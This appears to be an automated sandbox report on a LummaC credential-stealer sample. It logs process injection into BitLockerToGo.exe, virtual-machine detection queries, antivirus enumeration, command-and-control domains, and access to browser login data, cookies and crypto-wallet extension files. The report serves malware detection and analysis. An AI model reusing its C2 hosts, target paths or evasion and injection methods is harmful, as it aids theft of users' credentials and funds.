Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Installer_x64.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Installer_x64.exe

Static file information: File size 11749376 > 1048576

Source: Installer_x64.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x513200
Source: Installer_x64.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x59a200

Source: Installer_x64.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: Installer_x64.exe, 00000000.00000003.2278364976.000000000B894000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: Installer_x64.exe, 00000000.00000003.2278364976.000000000B894000.00000004.00001000.00020000.00000000.sdmp

Source: Installer_x64.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F82567 push cs; iretd	3_3_02F82568
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F82567 push cs; iretd	3_3_02F82568
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F87CFA pushfd ; iretd	3_3_02F87D1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F82567 push cs; iretd	3_3_02F82568
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F82567 push cs; iretd	3_3_02F82568
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F87346 push esp; retf	3_3_02F87561
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F87D23 pushfd ; iretd	3_3_02F87D1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_3_02F87D1E push eax; iretd	3_3_02F87D21

Source: C:\Users\user\Desktop\Installer_x64.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2820	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 2820	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370800500.00000000054E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453636157.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2410890655.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453636157.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Installer_x64.exe, 00000000.00000002.2333329371.000000000090D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: BitLockerToGo.exe, 00000003.00000003.2370800500.00000000054E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: BitLockerToGo.exe, 00000003.00000003.2370946427.00000000054D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00441610 LdrInitializeThunk,

3_2_00441610

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Installer_x64.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Installer_x64.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Installer_x64.exe	String found in binary or memory: nearycrepso.shop
Source: Installer_x64.exe	String found in binary or memory: abruptyopsn.shop
Source: Installer_x64.exe	String found in binary or memory: wholersorie.shop
Source: Installer_x64.exe	String found in binary or memory: framekgirus.shop
Source: Installer_x64.exe	String found in binary or memory: tirepublicerj.shop
Source: Installer_x64.exe	String found in binary or memory: noisycuttej.shop
Source: Installer_x64.exe	String found in binary or memory: rabidcowse.shop
Source: Installer_x64.exe	String found in binary or memory: cloudewahsj.shop
Source: Installer_x64.exe	String found in binary or memory: impossiblekdo.click

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D46008	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 449000	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 457000	Jump to behavior

Source: C:\Users\user\Desktop\Installer_x64.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: Installer_x64.exe

Binary or memory string: union (La)SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSSHF_EXECINSTRSHF_INFO_LINKSTREAM_CLOSEDSafeArrayCopySafeArrayLockSanskrit (sa)SetBrushOrgExSetScrollInfoSetWindowLongSetswana (tn)ShellExecuteWShell_TrayWndStandAloneSigStartServiceWSuriname (le)SysFreeStringTYPE_SFIXED32TYPE_SFIXED64Thread32FirstTigrinya (ti)Tokelau (les)Usage of %s:

Source: C:\Users\user\Desktop\Installer_x64.exe	Queries volume information: C:\Users\user\Desktop\Installer_x64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Queries volume information: C:\Users\user\Desktop\Installer_x64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Installer_x64.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: BitLockerToGo.exe, 00000003.00000003.2415123560.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415772893.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe	String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe	String found in binary or memory: Wallets/ElectronCash
Source: BitLockerToGo.exe	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe	String found in binary or memory: Wallets/JAXX New Version
Source: BitLockerToGo.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe	String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: BitLockerToGo.exe, 00000003.00000003.2381638051.0000000002F59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger LiveF

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
